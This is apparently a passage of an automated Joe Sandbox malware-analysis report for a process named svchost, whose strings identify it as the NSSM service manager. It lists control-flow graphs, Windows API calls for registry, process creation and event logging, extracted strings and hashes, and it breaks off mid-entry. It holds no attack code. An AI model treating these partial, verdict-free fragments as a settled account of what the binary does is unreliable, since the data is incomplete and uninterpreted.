HeapFree 256->267 268 40c164-40c181 call 405400 256->268 266 40c26e-40c285 call 40af80 261->266 262->266 264->252 265->252 275 40c287-40c28d 266->275 276 40c29d 266->276 267->255 268->267 277 40c29f-40c2a5 275->277 278 40c28f-40c29b 275->278 276->277 279 40c2ab-40c2c5 call 40af80 277->279 278->279 282 40c2c7 279->282 283 40c2ce-40c2e8 call 40af80 279->283 282->283 286 40c2f1-40c30b call 40af80 283->286 287 40c2ea 283->287 290 40c314-40c32e call 40af80 286->290 291 40c30d 286->291 287->286 294 40c330 290->294 295 40c337-40c365 GetCurrentDirectoryW SetCurrentDirectoryW call 40b460 290->295 291->290 294->295 298 40c394-40c409 SetCurrentDirectoryW call 40b240 * 2 RegQueryValueExW 295->298 299 40c367-40c38f call 405400 RegCloseKey SetCurrentDirectoryW 295->299 306 40c45a 298->306 307 40c40b-40c40e 298->307 299->241 308 40c45f-40c46e 306->308 307->308 309 40c410-40c416 307->309 310 40c470-40c476 308->310 311 40c47c-40c4f7 call 40b240 * 3 call 40b5d0 308->311 312 40c434-40c458 GetLastError call 4052c0 call 405400 309->312 313 40c418-40c432 call 405400 309->313 310->311 328 40c538-40c53f RegCloseKey 311->328 329 40c4f9-40c501 311->329 312->308 313->308 328->241 329->328 330 40c503 329->330 331 40c508-40c51c call 412c36 330->331 334 40c532 331->334 335 40c51e-40c52e 331->335 334->328 335->331 336 40c530 335->336 336->328
                                                    APIs
                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 0040BF4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppNoConsole$AppParameters$AppPriority$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$Application$NSSM
                                                    • API String ID: 3535843008-3183881257
                                                    • Opcode ID: 9d6ed601ee8fd9dcf12f7f88999e966fcfd8d83c6499986d4efbcf7daf40cfc1
                                                    • Instruction ID: f5cea916ee1c04784f8007666e06431dbadbb17f458edc9d2949b720bf79e7c7
                                                    • Opcode Fuzzy Hash: 9d6ed601ee8fd9dcf12f7f88999e966fcfd8d83c6499986d4efbcf7daf40cfc1
                                                    • Instruction Fuzzy Hash: 0AF1BDF1544304BBE320AB618C86FFB7798EB85708F50492EF749A51C2E7BCA544C76A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 492 40f580-40f5b5 call 412cf0 495 40f5b7-40f5ce call 412cdc 492->495 496 40f5cf-40f607 call 412d20 call 40bec0 492->496 503 40f640-40f66d call 412731 496->503 504 40f609-40f63f call 405400 call 40e6e0 call 412cdc 496->504 510 40f6ad-40f6be call 40e830 503->510 511 40f66f-40f6ac call 405400 call 40e6e0 call 412cdc 503->511 519 40f6c0-40f6c6 call 405190 510->519 520 40f6c9-40f6d1 510->520 519->520 524 40f6d3-40f6d9 call 405140 520->524 525 40f6dc-40f6ec call 409270 520->525 524->525 533 40f742-40f74c 525->533 534 40f6ee-40f70a call 405400 525->534 536 40f750-40f767 533->536 537 40f74e 533->537 543 40f712-40f741 call 408bb0 call 40e6e0 call 412cdc 534->543 544 40f70c FreeConsole 534->544 539 40f769 536->539 540 40f76c-40f79a CreateProcessW 536->540 537->536 539->540 541 40f7fb-40f821 call 409f50 540->541 542 40f79c-40f7fa GetLastError call 4052c0 call 405400 call 408bb0 call 405290 call 40e6e0 call 412cdc 540->542 551 40f823-40f827 541->551 552 40f82a-40f83e call 408bb0 541->552 544->543 551->552 561 40f840 FreeConsole 552->561 562 40f846-40f861 call 405290 552->562 561->562 569 40f904-40f910 562->569 570 40f867-40f886 GetProcessAffinityMask 562->570 572 40f912-40f96e call 412731 * 2 call 405400 569->572 573 40f973-40f9ab WaitForSingleObject SetServiceStatus 569->573 574 40f898-40f8c4 GetLastError call 4052c0 call 405400 570->574 575 40f888-40f896 570->575 572->573 577 40f9d1-40f9da 573->577 578 40f9ad-40f9b5 573->578 580 40f8c7-40f8d7 SetProcessAffinityMask 574->580 575->580 587 40f9dc-40f9e3 577->587 588 40f9ef-40fa07 call 412cdc 577->588 583 40f9c7 578->583 584 40f9b7-40f9c5 WaitForSingleObject 578->584 585 40f8f9-40f8fe ResumeThread 580->585 586 40f8d9-40f8f6 GetLastError call 4052c0 call 405400 580->586 583->577 584->577 584->583 585->569 586->585 587->588 593 40f9e5 587->593 593->588
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID: "%s" %s$%lu$D$NSSM$command line$start_service
                                                    • API String ID: 2102423945-3686305457
                                                    • Opcode ID: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
                                                    • Instruction ID: 8d8a3d24360daf10ba7eb9db1eca87cf74f697693d6f1518d53dda03d5ccb93b
                                                    • Opcode Fuzzy Hash: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
                                                    • Instruction Fuzzy Hash: BFC179F1A10700ABD720DB65DC46FDB73D8AB84308F40493EF69DA61C1E6BDA544CB69

                                                    Control-flow Graph

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000001,00000000), ref: 0040ACEC
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040ACF3
                                                    • _memset.LIBCMT ref: 0040AD2C
                                                    • RegQueryValueExW.KERNELBASE ref: 0040AD57
                                                    • GetLastError.KERNEL32 ref: 0040AD63
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AD6E
                                                    • HeapFree.KERNEL32(00000000), ref: 0040AD75
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Event$ProcessSource$AllocDeregisterErrorFreeLastQueryRegisterReportValue_memset
                                                    • String ID: get_string()
                                                    • API String ID: 2603871056-896229945
                                                    • Opcode ID: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
                                                    • Instruction ID: 72e98944cf36b2bbc6af698ef9dc07420c8870f262d0e465f671d630dce17b03
                                                    • Opcode Fuzzy Hash: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
                                                    • Instruction Fuzzy Hash: 154115B19043006BE310AB58EC09FEB7B9CEF8471AF44457AF549A2182D7B9C954C6AB

                                                    Control-flow Graph

                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040A88E
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000,00409EC9), ref: 0040A8EB
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A8F7
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
                                                    • API String ID: 508490100-129066941
                                                    • Opcode ID: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
                                                    • Instruction ID: 189017753002612d24ec776b8254467aa4e8da1510a31d32c64f91d8f6ef9f68
                                                    • Opcode Fuzzy Hash: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
                                                    • Instruction Fuzzy Hash: 0A31CAF1A443006BE210E754CC47FEB7394EB88B08F50452EB659971C2F6F8A5848796

                                                    Control-flow Graph

                                                    APIs
                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,00000000,?,?,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040AB95
                                                    • GetLastError.KERNEL32(00000000,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040ABBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastQueryValue
                                                    • String ID: get_environment()
                                                    • API String ID: 1349404517-3013924771
                                                    • Opcode ID: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
                                                    • Instruction ID: 1d8989cfc65caa848716c5f45015e9ce7db8ed1eb8c61d39c0da8540bf3f80e9
                                                    • Opcode Fuzzy Hash: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
                                                    • Instruction Fuzzy Hash: 2541A1F26043006BE3109B55EC45FA777ACEB8471AF20457EF645E72C1D6B9D440CA66

                                                    Control-flow Graph

                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040A9FA
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,?,00000000), ref: 0040AA5D
                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040AA69
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: AppExit$NSSM_REG_EXIT$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$create_exit_action()
                                                    • API String ID: 508490100-4149098550
                                                    • Opcode ID: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
                                                    • Instruction ID: c54e0a44a042602298dc2c5b83e2bd5604e14107d9abb35974e2f0600bad2026
                                                    • Opcode Fuzzy Hash: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
                                                    • Instruction Fuzzy Hash: FB4109F1B443006BE6209754CD4BFEB7398DB98704F50452EF64AAA1C2EAB8D544CB9B

                                                    Control-flow Graph

                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040B349
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • __snwprintf_s.LIBCMT ref: 0040B365
                                                    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0040B3CA
                                                    • GetLastError.KERNEL32(00000000), ref: 0040B3D6
                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?), ref: 0040B41F
                                                    Strings
                                                    • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 0040B354
                                                    • NSSM_REGISTRY, xrefs: 0040B378
                                                    • SYSTEM\CurrentControlSet\Services\%s\Parameters\%s, xrefs: 0040B338
                                                    • open_registry(), xrefs: 0040B373
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_s$CreateErrorLastOpen__vsnwprintf_s_l
                                                    • String ID: NSSM_REGISTRY$SYSTEM\CurrentControlSet\Services\%s\Parameters$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$open_registry()
                                                    • API String ID: 3162672713-2180615361
                                                    • Opcode ID: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
                                                    • Instruction ID: 51ad032d09eab74b91555c8713cdb19e4fcc5e6d9908cd399ce7877185dd2446
                                                    • Opcode Fuzzy Hash: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
                                                    • Instruction Fuzzy Hash: 3221E6F0A443016FE220F760CD47FBB3398EB54704F90452E7659E61C2FAB8954086AA

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040B310: __snwprintf_s.LIBCMT ref: 0040B349
                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,?,?,?), ref: 0040B65F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040B66A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue__snwprintf_s
                                                    • String ID: %lu$AppExit
                                                    • API String ID: 2736435911-2506947422
                                                    • Opcode ID: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
                                                    • Instruction ID: c411b45a6930565bb1268b54e23c5314efaf1e743d4ddd058092e23d946cddcd
                                                    • Opcode Fuzzy Hash: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
                                                    • Instruction Fuzzy Hash: 4E31B2726043046BD300DB25DC41AAFB7E8EFC8314F84492EFA5992281FB7AD5458BDA

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 773 40b240-40b288 RegQueryValueExW 774 40b2f0-40b301 call 412cdc 773->774 775 40b28a-40b28d 773->775 777 40b2ea-40b2ee 775->777 778 40b28f-40b294 775->778 777->774 780 40b296-40b2c6 call 412731 call 405400 778->780 781 40b2c8-40b2e7 GetLastError call 4052c0 call 405400 778->781 780->777 781->777
                                                    APIs
                                                    • RegQueryValueExW.KERNELBASE ref: 0040B280
                                                    • __snwprintf_s.LIBCMT ref: 0040B2A9
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • GetLastError.KERNEL32(00000000), ref: 0040B2CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterErrorLastQueryRegisterReportValue__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %lu
                                                    • API String ID: 2741730872-685833217
                                                    • Opcode ID: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
                                                    • Instruction ID: 9b57c4e92f1354976d5d0f2d51147bf8e68e588caea2cac463da8bdf8903c173
                                                    • Opcode Fuzzy Hash: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
                                                    • Instruction Fuzzy Hash: 911190B1504300AFD210DB55DC4AFAFB7E8EB8D718F40492DF649A6281D674E944CBAB

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 790 405400-405415 RegisterEventSourceW 791 405466-40546a 790->791 792 405417-40541f 790->792 793 405421 792->793 794 405438-405460 ReportEventW DeregisterEventSource 792->794 795 405425-405428 793->795 794->791 795->794 796 40542a-405436 795->796 796->794 796->795
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                    • ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterRegisterReport
                                                    • String ID: nssm
                                                    • API String ID: 3235303502-2602286837
                                                    • Opcode ID: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
                                                    • Instruction ID: d3648bf1d166a2bd8de7c6c9c4a863b798114447eb191853c28b7c632e5ffc8e
                                                    • Opcode Fuzzy Hash: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
                                                    • Instruction Fuzzy Hash: D8F0A4B0505711ABE714DB04DC19BFBBBA5EF88705F40842CF542EA2C0D774D9418F9A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 797 409920-409971 AllocateAndInitializeSid 798 409973-409989 CheckTokenMembership FreeSid 797->798 799 40998f-40999e call 412cdc 797->799 798->799
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
                                                    • CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
                                                    • FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
                                                    • Instruction ID: 72e0c7922e14d595f5e3848571bc75bc3c4e4abfa34b06bfca4019b358322d7e
                                                    • Opcode Fuzzy Hash: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
                                                    • Instruction Fuzzy Hash: 4501A77134C380BFD301DB649985A6BBFD8AB99700FC4985EF58583242D174D408C76B

                                                    Control-flow Graph

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401A35
                                                    • FillConsoleOutputAttribute.KERNELBASE(00000000,000000C0,?,?,?), ref: 00401A62
                                                    • FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401A72
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleFillOutput$AttributeCharacterHandle
                                                    • String ID:
                                                    • API String ID: 3042536769-0
                                                    • Opcode ID: 95c137ac06ca406579a6d85467d849bb65a0f3e508194bdda109f111fce98bd0
                                                    • Instruction ID: 77fbf6a8a0b04aca51523caecfdb8986c69d7abe1881f4de13a62e1bdab06c50
                                                    • Opcode Fuzzy Hash: 95c137ac06ca406579a6d85467d849bb65a0f3e508194bdda109f111fce98bd0
                                                    • Instruction Fuzzy Hash: A2E01CB500A216BAE210DF50ED48EDBB7ACEF89B54F004A59F16593160E3709945C7BB
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401AD5
                                                    • FillConsoleOutputAttribute.KERNELBASE(00000000,00000000,?,?,?), ref: 00401AFF
                                                    • FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401B0F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleFillOutput$AttributeCharacterHandle
                                                    • String ID:
                                                    • API String ID: 3042536769-0
                                                    • Opcode ID: dd09dcd497fea648322d313fa1981f7ecff786c9414ae34b4543ece9a9281358
                                                    • Instruction ID: 3d5203a324c54e0c1a2c141d7bb79ef220f5eecb49d30cd12f98b3b48fc8e675
                                                    • Opcode Fuzzy Hash: dd09dcd497fea648322d313fa1981f7ecff786c9414ae34b4543ece9a9281358
                                                    • Instruction Fuzzy Hash: ECE08CB5009202BAD200DF40ED48EDBB7ACEF88B50F004948F16482160E330880487BB
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401A85
                                                    • FillConsoleOutputAttribute.KERNELBASE(00000000,00000040,?,?,?), ref: 00401AAF
                                                    • FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401ABF
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleFillOutput$AttributeCharacterHandle
                                                    • String ID:
                                                    • API String ID: 3042536769-0
                                                    • Opcode ID: 93abe4eb89c4456a5bac7811860cf9eb8417963c086c90116b55cb21d40498a7
